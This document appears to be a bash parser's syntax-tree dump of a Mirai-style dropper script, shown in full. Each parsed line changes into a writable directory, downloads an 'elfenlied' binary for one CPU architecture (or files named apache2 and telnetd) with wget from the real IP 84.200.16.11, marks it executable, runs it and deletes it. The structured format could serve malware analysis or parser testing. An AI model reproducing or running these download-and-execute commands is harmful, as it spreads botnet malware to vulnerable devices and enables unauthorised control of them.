ListNode(lineno=2, pos=(12, 168), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 105), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 105), word='http://84.200.16.11/elfenliedmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(105, 106)),
  CommandNode(lineno=2, pos=(107, 129), parts=[
    WordNode(lineno=2, pos=(107, 112), word='chmod'),
    WordNode(lineno=2, pos=(113, 115), word='+x'),
    WordNode(lineno=2, pos=(116, 129), word='elfenliedmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(129, 130)),
  CommandNode(lineno=2, pos=(131, 146), parts=[
    WordNode(lineno=2, pos=(131, 146), word='./elfenliedmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(146, 147)),
  CommandNode(lineno=2, pos=(148, 168), parts=[
    WordNode(lineno=2, pos=(148, 150), word='rm'),
    WordNode(lineno=2, pos=(151, 154), word='-rf'),
    WordNode(lineno=2, pos=(155, 168), word='elfenliedmips'),
  ]),
])
ListNode(lineno=3, pos=(169, 333), parts=[
  CommandNode(lineno=3, pos=(169, 176), parts=[
    WordNode(lineno=3, pos=(169, 171), word='cd'),
    WordNode(lineno=3, pos=(172, 176), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(177, 179)),
  CommandNode(lineno=3, pos=(180, 191), parts=[
    WordNode(lineno=3, pos=(180, 182), word='cd'),
    WordNode(lineno=3, pos=(183, 191), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(192, 194)),
  CommandNode(lineno=3, pos=(195, 202), parts=[
    WordNode(lineno=3, pos=(195, 197), word='cd'),
    WordNode(lineno=3, pos=(198, 202), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(203, 205)),
  CommandNode(lineno=3, pos=(206, 214), parts=[
    WordNode(lineno=3, pos=(206, 208), word='cd'),
    WordNode(lineno=3, pos=(209, 214), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(215, 217)),
  CommandNode(lineno=3, pos=(218, 222), parts=[
    WordNode(lineno=3, pos=(218, 220), word='cd'),
    WordNode(lineno=3, pos=(221, 222), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(222, 223)),
  CommandNode(lineno=3, pos=(224, 264), parts=[
    WordNode(lineno=3, pos=(224, 228), word='wget'),
    WordNode(lineno=3, pos=(229, 264), word='http://84.200.16.11/elfenliedmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(264, 265)),
  CommandNode(lineno=3, pos=(266, 290), parts=[
    WordNode(lineno=3, pos=(266, 271), word='chmod'),
    WordNode(lineno=3, pos=(272, 274), word='+x'),
    WordNode(lineno=3, pos=(275, 290), word='elfenliedmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(290, 291)),
  CommandNode(lineno=3, pos=(292, 309), parts=[
    WordNode(lineno=3, pos=(292, 309), word='./elfenliedmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(309, 310)),
  CommandNode(lineno=3, pos=(311, 333), parts=[
    WordNode(lineno=3, pos=(311, 313), word='rm'),
    WordNode(lineno=3, pos=(314, 317), word='-rf'),
    WordNode(lineno=3, pos=(318, 333), word='elfenliedmipsel'),
  ]),
])
ListNode(lineno=4, pos=(334, 486), parts=[
  CommandNode(lineno=4, pos=(334, 341), parts=[
    WordNode(lineno=4, pos=(334, 336), word='cd'),
    WordNode(lineno=4, pos=(337, 341), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(342, 344)),
  CommandNode(lineno=4, pos=(345, 356), parts=[
    WordNode(lineno=4, pos=(345, 347), word='cd'),
    WordNode(lineno=4, pos=(348, 356), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(357, 359)),
  CommandNode(lineno=4, pos=(360, 367), parts=[
    WordNode(lineno=4, pos=(360, 362), word='cd'),
    WordNode(lineno=4, pos=(363, 367), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(368, 370)),
  CommandNode(lineno=4, pos=(371, 379), parts=[
    WordNode(lineno=4, pos=(371, 373), word='cd'),
    WordNode(lineno=4, pos=(374, 379), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(380, 382)),
  CommandNode(lineno=4, pos=(383, 387), parts=[
    WordNode(lineno=4, pos=(383, 385), word='cd'),
    WordNode(lineno=4, pos=(386, 387), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(387, 388)),
  CommandNode(lineno=4, pos=(389, 426), parts=[
    WordNode(lineno=4, pos=(389, 393), word='wget'),
    WordNode(lineno=4, pos=(394, 426), word='http://84.200.16.11/elfenliedsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(426, 427)),
  CommandNode(lineno=4, pos=(428, 449), parts=[
    WordNode(lineno=4, pos=(428, 433), word='chmod'),
    WordNode(lineno=4, pos=(434, 436), word='+x'),
    WordNode(lineno=4, pos=(437, 449), word='elfenliedsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(449, 450)),
  CommandNode(lineno=4, pos=(451, 465), parts=[
    WordNode(lineno=4, pos=(451, 465), word='./elfenliedsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(465, 466)),
  CommandNode(lineno=4, pos=(467, 486), parts=[
    WordNode(lineno=4, pos=(467, 469), word='rm'),
    WordNode(lineno=4, pos=(470, 473), word='-rf'),
    WordNode(lineno=4, pos=(474, 486), word='elfenliedsh4'),
  ]),
])
ListNode(lineno=5, pos=(487, 639), parts=[
  CommandNode(lineno=5, pos=(487, 494), parts=[
    WordNode(lineno=5, pos=(487, 489), word='cd'),
    WordNode(lineno=5, pos=(490, 494), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(495, 497)),
  CommandNode(lineno=5, pos=(498, 509), parts=[
    WordNode(lineno=5, pos=(498, 500), word='cd'),
    WordNode(lineno=5, pos=(501, 509), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(510, 512)),
  CommandNode(lineno=5, pos=(513, 520), parts=[
    WordNode(lineno=5, pos=(513, 515), word='cd'),
    WordNode(lineno=5, pos=(516, 520), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(521, 523)),
  CommandNode(lineno=5, pos=(524, 532), parts=[
    WordNode(lineno=5, pos=(524, 526), word='cd'),
    WordNode(lineno=5, pos=(527, 532), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(533, 535)),
  CommandNode(lineno=5, pos=(536, 540), parts=[
    WordNode(lineno=5, pos=(536, 538), word='cd'),
    WordNode(lineno=5, pos=(539, 540), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(540, 541)),
  CommandNode(lineno=5, pos=(542, 579), parts=[
    WordNode(lineno=5, pos=(542, 546), word='wget'),
    WordNode(lineno=5, pos=(547, 579), word='http://84.200.16.11/elfenliedx86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(579, 580)),
  CommandNode(lineno=5, pos=(581, 602), parts=[
    WordNode(lineno=5, pos=(581, 586), word='chmod'),
    WordNode(lineno=5, pos=(587, 589), word='+x'),
    WordNode(lineno=5, pos=(590, 602), word='elfenliedx86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(602, 603)),
  CommandNode(lineno=5, pos=(604, 618), parts=[
    WordNode(lineno=5, pos=(604, 618), word='./elfenliedx86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(618, 619)),
  CommandNode(lineno=5, pos=(620, 639), parts=[
    WordNode(lineno=5, pos=(620, 622), word='rm'),
    WordNode(lineno=5, pos=(623, 626), word='-rf'),
    WordNode(lineno=5, pos=(627, 639), word='elfenliedx86'),
  ]),
])
ListNode(lineno=6, pos=(640, 804), parts=[
  CommandNode(lineno=6, pos=(640, 647), parts=[
    WordNode(lineno=6, pos=(640, 642), word='cd'),
    WordNode(lineno=6, pos=(643, 647), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(648, 650)),
  CommandNode(lineno=6, pos=(651, 662), parts=[
    WordNode(lineno=6, pos=(651, 653), word='cd'),
    WordNode(lineno=6, pos=(654, 662), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(663, 665)),
  CommandNode(lineno=6, pos=(666, 673), parts=[
    WordNode(lineno=6, pos=(666, 668), word='cd'),
    WordNode(lineno=6, pos=(669, 673), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(674, 676)),
  CommandNode(lineno=6, pos=(677, 685), parts=[
    WordNode(lineno=6, pos=(677, 679), word='cd'),
    WordNode(lineno=6, pos=(680, 685), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(686, 688)),
  CommandNode(lineno=6, pos=(689, 693), parts=[
    WordNode(lineno=6, pos=(689, 691), word='cd'),
    WordNode(lineno=6, pos=(692, 693), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(693, 694)),
  CommandNode(lineno=6, pos=(695, 735), parts=[
    WordNode(lineno=6, pos=(695, 699), word='wget'),
    WordNode(lineno=6, pos=(700, 735), word='http://84.200.16.11/elfenliedarmv6l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(735, 736)),
  CommandNode(lineno=6, pos=(737, 761), parts=[
    WordNode(lineno=6, pos=(737, 742), word='chmod'),
    WordNode(lineno=6, pos=(743, 745), word='+x'),
    WordNode(lineno=6, pos=(746, 761), word='elfenliedarmv6l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(761, 762)),
  CommandNode(lineno=6, pos=(763, 780), parts=[
    WordNode(lineno=6, pos=(763, 780), word='./elfenliedarmv6l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(780, 781)),
  CommandNode(lineno=6, pos=(782, 804), parts=[
    WordNode(lineno=6, pos=(782, 784), word='rm'),
    WordNode(lineno=6, pos=(785, 788), word='-rf'),
    WordNode(lineno=6, pos=(789, 804), word='elfenliedarmv6l'),
  ]),
])
ListNode(lineno=7, pos=(805, 961), parts=[
  CommandNode(lineno=7, pos=(805, 812), parts=[
    WordNode(lineno=7, pos=(805, 807), word='cd'),
    WordNode(lineno=7, pos=(808, 812), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(813, 815)),
  CommandNode(lineno=7, pos=(816, 827), parts=[
    WordNode(lineno=7, pos=(816, 818), word='cd'),
    WordNode(lineno=7, pos=(819, 827), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(828, 830)),
  CommandNode(lineno=7, pos=(831, 838), parts=[
    WordNode(lineno=7, pos=(831, 833), word='cd'),
    WordNode(lineno=7, pos=(834, 838), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(839, 841)),
  CommandNode(lineno=7, pos=(842, 850), parts=[
    WordNode(lineno=7, pos=(842, 844), word='cd'),
    WordNode(lineno=7, pos=(845, 850), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(851, 853)),
  CommandNode(lineno=7, pos=(854, 858), parts=[
    WordNode(lineno=7, pos=(854, 856), word='cd'),
    WordNode(lineno=7, pos=(857, 858), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(858, 859)),
  CommandNode(lineno=7, pos=(860, 898), parts=[
    WordNode(lineno=7, pos=(860, 864), word='wget'),
    WordNode(lineno=7, pos=(865, 898), word='http://84.200.16.11/elfenliedi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(898, 899)),
  CommandNode(lineno=7, pos=(900, 922), parts=[
    WordNode(lineno=7, pos=(900, 905), word='chmod'),
    WordNode(lineno=7, pos=(906, 908), word='+x'),
    WordNode(lineno=7, pos=(909, 922), word='elfenliedi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(922, 923)),
  CommandNode(lineno=7, pos=(924, 939), parts=[
    WordNode(lineno=7, pos=(924, 939), word='./elfenliedi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(939, 940)),
  CommandNode(lineno=7, pos=(941, 961), parts=[
    WordNode(lineno=7, pos=(941, 943), word='rm'),
    WordNode(lineno=7, pos=(944, 947), word='-rf'),
    WordNode(lineno=7, pos=(948, 961), word='elfenliedi686'),
  ]),
])
ListNode(lineno=8, pos=(962, 1114), parts=[
  CommandNode(lineno=8, pos=(962, 969), parts=[
    WordNode(lineno=8, pos=(962, 964), word='cd'),
    WordNode(lineno=8, pos=(965, 969), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(970, 972)),
  CommandNode(lineno=8, pos=(973, 984), parts=[
    WordNode(lineno=8, pos=(973, 975), word='cd'),
    WordNode(lineno=8, pos=(976, 984), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(985, 987)),
  CommandNode(lineno=8, pos=(988, 995), parts=[
    WordNode(lineno=8, pos=(988, 990), word='cd'),
    WordNode(lineno=8, pos=(991, 995), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(996, 998)),
  CommandNode(lineno=8, pos=(999, 1007), parts=[
    WordNode(lineno=8, pos=(999, 1001), word='cd'),
    WordNode(lineno=8, pos=(1002, 1007), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1008, 1010)),
  CommandNode(lineno=8, pos=(1011, 1015), parts=[
    WordNode(lineno=8, pos=(1011, 1013), word='cd'),
    WordNode(lineno=8, pos=(1014, 1015), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1015, 1016)),
  CommandNode(lineno=8, pos=(1017, 1054), parts=[
    WordNode(lineno=8, pos=(1017, 1021), word='wget'),
    WordNode(lineno=8, pos=(1022, 1054), word='http://84.200.16.11/elfenliedppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1054, 1055)),
  CommandNode(lineno=8, pos=(1056, 1077), parts=[
    WordNode(lineno=8, pos=(1056, 1061), word='chmod'),
    WordNode(lineno=8, pos=(1062, 1064), word='+x'),
    WordNode(lineno=8, pos=(1065, 1077), word='elfenliedppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1077, 1078)),
  CommandNode(lineno=8, pos=(1079, 1093), parts=[
    WordNode(lineno=8, pos=(1079, 1093), word='./elfenliedppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1093, 1094)),
  CommandNode(lineno=8, pos=(1095, 1114), parts=[
    WordNode(lineno=8, pos=(1095, 1097), word='rm'),
    WordNode(lineno=8, pos=(1098, 1101), word='-rf'),
    WordNode(lineno=8, pos=(1102, 1114), word='elfenliedppc'),
  ]),
])
ListNode(lineno=9, pos=(1115, 1271), parts=[
  CommandNode(lineno=9, pos=(1115, 1122), parts=[
    WordNode(lineno=9, pos=(1115, 1117), word='cd'),
    WordNode(lineno=9, pos=(1118, 1122), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1123, 1125)),
  CommandNode(lineno=9, pos=(1126, 1137), parts=[
    WordNode(lineno=9, pos=(1126, 1128), word='cd'),
    WordNode(lineno=9, pos=(1129, 1137), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1138, 1140)),
  CommandNode(lineno=9, pos=(1141, 1148), parts=[
    WordNode(lineno=9, pos=(1141, 1143), word='cd'),
    WordNode(lineno=9, pos=(1144, 1148), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1149, 1151)),
  CommandNode(lineno=9, pos=(1152, 1160), parts=[
    WordNode(lineno=9, pos=(1152, 1154), word='cd'),
    WordNode(lineno=9, pos=(1155, 1160), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1161, 1163)),
  CommandNode(lineno=9, pos=(1164, 1168), parts=[
    WordNode(lineno=9, pos=(1164, 1166), word='cd'),
    WordNode(lineno=9, pos=(1167, 1168), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1168, 1169)),
  CommandNode(lineno=9, pos=(1170, 1208), parts=[
    WordNode(lineno=9, pos=(1170, 1174), word='wget'),
    WordNode(lineno=9, pos=(1175, 1208), word='http://84.200.16.11/elfenliedi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1208, 1209)),
  CommandNode(lineno=9, pos=(1210, 1232), parts=[
    WordNode(lineno=9, pos=(1210, 1215), word='chmod'),
    WordNode(lineno=9, pos=(1216, 1218), word='+x'),
    WordNode(lineno=9, pos=(1219, 1232), word='elfenliedi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1232, 1233)),
  CommandNode(lineno=9, pos=(1234, 1249), parts=[
    WordNode(lineno=9, pos=(1234, 1249), word='./elfenliedi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1249, 1250)),
  CommandNode(lineno=9, pos=(1251, 1271), parts=[
    WordNode(lineno=9, pos=(1251, 1253), word='rm'),
    WordNode(lineno=9, pos=(1254, 1257), word='-rf'),
    WordNode(lineno=9, pos=(1258, 1271), word='elfenliedi586'),
  ]),
])
ListNode(lineno=10, pos=(1272, 1428), parts=[
  CommandNode(lineno=10, pos=(1272, 1279), parts=[
    WordNode(lineno=10, pos=(1272, 1274), word='cd'),
    WordNode(lineno=10, pos=(1275, 1279), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1280, 1282)),
  CommandNode(lineno=10, pos=(1283, 1294), parts=[
    WordNode(lineno=10, pos=(1283, 1285), word='cd'),
    WordNode(lineno=10, pos=(1286, 1294), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1295, 1297)),
  CommandNode(lineno=10, pos=(1298, 1305), parts=[
    WordNode(lineno=10, pos=(1298, 1300), word='cd'),
    WordNode(lineno=10, pos=(1301, 1305), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1306, 1308)),
  CommandNode(lineno=10, pos=(1309, 1317), parts=[
    WordNode(lineno=10, pos=(1309, 1311), word='cd'),
    WordNode(lineno=10, pos=(1312, 1317), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1318, 1320)),
  CommandNode(lineno=10, pos=(1321, 1325), parts=[
    WordNode(lineno=10, pos=(1321, 1323), word='cd'),
    WordNode(lineno=10, pos=(1324, 1325), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1325, 1326)),
  CommandNode(lineno=10, pos=(1327, 1365), parts=[
    WordNode(lineno=10, pos=(1327, 1331), word='wget'),
    WordNode(lineno=10, pos=(1332, 1365), word='http://84.200.16.11/elfenliedm68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1365, 1366)),
  CommandNode(lineno=10, pos=(1367, 1389), parts=[
    WordNode(lineno=10, pos=(1367, 1372), word='chmod'),
    WordNode(lineno=10, pos=(1373, 1375), word='+x'),
    WordNode(lineno=10, pos=(1376, 1389), word='elfenliedm68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1389, 1390)),
  CommandNode(lineno=10, pos=(1391, 1406), parts=[
    WordNode(lineno=10, pos=(1391, 1406), word='./elfenliedm68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1406, 1407)),
  CommandNode(lineno=10, pos=(1408, 1428), parts=[
    WordNode(lineno=10, pos=(1408, 1410), word='rm'),
    WordNode(lineno=10, pos=(1411, 1414), word='-rf'),
    WordNode(lineno=10, pos=(1415, 1428), word='elfenliedm68k'),
  ]),
])
ListNode(lineno=11, pos=(1429, 1589), parts=[
  CommandNode(lineno=11, pos=(1429, 1436), parts=[
    WordNode(lineno=11, pos=(1429, 1431), word='cd'),
    WordNode(lineno=11, pos=(1432, 1436), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1437, 1439)),
  CommandNode(lineno=11, pos=(1440, 1451), parts=[
    WordNode(lineno=11, pos=(1440, 1442), word='cd'),
    WordNode(lineno=11, pos=(1443, 1451), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1452, 1454)),
  CommandNode(lineno=11, pos=(1455, 1462), parts=[
    WordNode(lineno=11, pos=(1455, 1457), word='cd'),
    WordNode(lineno=11, pos=(1458, 1462), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1463, 1465)),
  CommandNode(lineno=11, pos=(1466, 1474), parts=[
    WordNode(lineno=11, pos=(1466, 1468), word='cd'),
    WordNode(lineno=11, pos=(1469, 1474), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1475, 1477)),
  CommandNode(lineno=11, pos=(1478, 1482), parts=[
    WordNode(lineno=11, pos=(1478, 1480), word='cd'),
    WordNode(lineno=11, pos=(1481, 1482), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1482, 1483)),
  CommandNode(lineno=11, pos=(1484, 1523), parts=[
    WordNode(lineno=11, pos=(1484, 1488), word='wget'),
    WordNode(lineno=11, pos=(1489, 1523), word='http://84.200.16.11/elfenliedsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1523, 1524)),
  CommandNode(lineno=11, pos=(1525, 1548), parts=[
    WordNode(lineno=11, pos=(1525, 1530), word='chmod'),
    WordNode(lineno=11, pos=(1531, 1533), word='+x'),
    WordNode(lineno=11, pos=(1534, 1548), word='elfenliedsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1548, 1549)),
  CommandNode(lineno=11, pos=(1550, 1566), parts=[
    WordNode(lineno=11, pos=(1550, 1566), word='./elfenliedsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1566, 1567)),
  CommandNode(lineno=11, pos=(1568, 1589), parts=[
    WordNode(lineno=11, pos=(1568, 1570), word='rm'),
    WordNode(lineno=11, pos=(1571, 1574), word='-rf'),
    WordNode(lineno=11, pos=(1575, 1589), word='elfenliedsparc'),
  ]),
])
ListNode(lineno=12, pos=(1590, 1706), parts=[
  CommandNode(lineno=12, pos=(1590, 1597), parts=[
    WordNode(lineno=12, pos=(1590, 1592), word='cd'),
    WordNode(lineno=12, pos=(1593, 1597), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1598, 1600)),
  CommandNode(lineno=12, pos=(1601, 1612), parts=[
    WordNode(lineno=12, pos=(1601, 1603), word='cd'),
    WordNode(lineno=12, pos=(1604, 1612), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1613, 1615)),
  CommandNode(lineno=12, pos=(1616, 1623), parts=[
    WordNode(lineno=12, pos=(1616, 1618), word='cd'),
    WordNode(lineno=12, pos=(1619, 1623), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1624, 1626)),
  CommandNode(lineno=12, pos=(1627, 1635), parts=[
    WordNode(lineno=12, pos=(1627, 1629), word='cd'),
    WordNode(lineno=12, pos=(1630, 1635), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1636, 1638)),
  CommandNode(lineno=12, pos=(1639, 1643), parts=[
    WordNode(lineno=12, pos=(1639, 1641), word='cd'),
    WordNode(lineno=12, pos=(1642, 1643), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1643, 1644)),
  CommandNode(lineno=12, pos=(1645, 1673), parts=[
    WordNode(lineno=12, pos=(1645, 1649), word='wget'),
    WordNode(lineno=12, pos=(1650, 1673), word='http://84.200.16.11/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1673, 1674)),
  CommandNode(lineno=12, pos=(1675, 1687), parts=[
    WordNode(lineno=12, pos=(1675, 1680), word='chmod'),
    WordNode(lineno=12, pos=(1681, 1683), word='+x'),
    WordNode(lineno=12, pos=(1684, 1687), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1687, 1688)),
  CommandNode(lineno=12, pos=(1689, 1694), parts=[
    WordNode(lineno=12, pos=(1689, 1694), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1694, 1695)),
  CommandNode(lineno=12, pos=(1696, 1706), parts=[
    WordNode(lineno=12, pos=(1696, 1698), word='rm'),
    WordNode(lineno=12, pos=(1699, 1702), word='-rf'),
    WordNode(lineno=12, pos=(1703, 1706), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1707, 1839), parts=[
  CommandNode(lineno=13, pos=(1707, 1714), parts=[
    WordNode(lineno=13, pos=(1707, 1709), word='cd'),
    WordNode(lineno=13, pos=(1710, 1714), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1715, 1717)),
  CommandNode(lineno=13, pos=(1718, 1729), parts=[
    WordNode(lineno=13, pos=(1718, 1720), word='cd'),
    WordNode(lineno=13, pos=(1721, 1729), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1730, 1732)),
  CommandNode(lineno=13, pos=(1733, 1740), parts=[
    WordNode(lineno=13, pos=(1733, 1735), word='cd'),
    WordNode(lineno=13, pos=(1736, 1740), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1741, 1743)),
  CommandNode(lineno=13, pos=(1744, 1752), parts=[
    WordNode(lineno=13, pos=(1744, 1746), word='cd'),
    WordNode(lineno=13, pos=(1747, 1752), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1753, 1755)),
  CommandNode(lineno=13, pos=(1756, 1760), parts=[
    WordNode(lineno=13, pos=(1756, 1758), word='cd'),
    WordNode(lineno=13, pos=(1759, 1760), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1760, 1761)),
  CommandNode(lineno=13, pos=(1762, 1794), parts=[
    WordNode(lineno=13, pos=(1762, 1766), word='wget'),
    WordNode(lineno=13, pos=(1767, 1794), word='http://84.200.16.11/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1794, 1795)),
  CommandNode(lineno=13, pos=(1796, 1812), parts=[
    WordNode(lineno=13, pos=(1796, 1801), word='chmod'),
    WordNode(lineno=13, pos=(1802, 1804), word='+x'),
    WordNode(lineno=13, pos=(1805, 1812), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1812, 1813)),
  CommandNode(lineno=13, pos=(1814, 1823), parts=[
    WordNode(lineno=13, pos=(1814, 1823), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1823, 1824)),
  CommandNode(lineno=13, pos=(1825, 1839), parts=[
    WordNode(lineno=13, pos=(1825, 1827), word='rm'),
    WordNode(lineno=13, pos=(1828, 1831), word='-rf'),
    WordNode(lineno=13, pos=(1832, 1839), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1840, 1972), parts=[
  CommandNode(lineno=14, pos=(1840, 1847), parts=[
    WordNode(lineno=14, pos=(1840, 1842), word='cd'),
    WordNode(lineno=14, pos=(1843, 1847), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1848, 1850)),
  CommandNode(lineno=14, pos=(1851, 1862), parts=[
    WordNode(lineno=14, pos=(1851, 1853), word='cd'),
    WordNode(lineno=14, pos=(1854, 1862), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1863, 1865)),
  CommandNode(lineno=14, pos=(1866, 1873), parts=[
    WordNode(lineno=14, pos=(1866, 1868), word='cd'),
    WordNode(lineno=14, pos=(1869, 1873), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1874, 1876)),
  CommandNode(lineno=14, pos=(1877, 1885), parts=[
    WordNode(lineno=14, pos=(1877, 1879), word='cd'),
    WordNode(lineno=14, pos=(1880, 1885), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1886, 1888)),
  CommandNode(lineno=14, pos=(1889, 1893), parts=[
    WordNode(lineno=14, pos=(1889, 1891), word='cd'),
    WordNode(lineno=14, pos=(1892, 1893), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1893, 1894)),
  CommandNode(lineno=14, pos=(1895, 1927), parts=[
    WordNode(lineno=14, pos=(1895, 1899), word='wget'),
    WordNode(lineno=14, pos=(1900, 1927), word='http://84.200.16.11/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1927, 1928)),
  CommandNode(lineno=14, pos=(1929, 1945), parts=[
    WordNode(lineno=14, pos=(1929, 1934), word='chmod'),
    WordNode(lineno=14, pos=(1935, 1937), word='+x'),
    WordNode(lineno=14, pos=(1938, 1945), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1945, 1946)),
  CommandNode(lineno=14, pos=(1947, 1956), parts=[
    WordNode(lineno=14, pos=(1947, 1956), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1956, 1957)),
  CommandNode(lineno=14, pos=(1958, 1972), parts=[
    WordNode(lineno=14, pos=(1958, 1960), word='rm'),
    WordNode(lineno=14, pos=(1961, 1964), word='-rf'),
    WordNode(lineno=14, pos=(1965, 1972), word='telnetd'),
  ]),
])
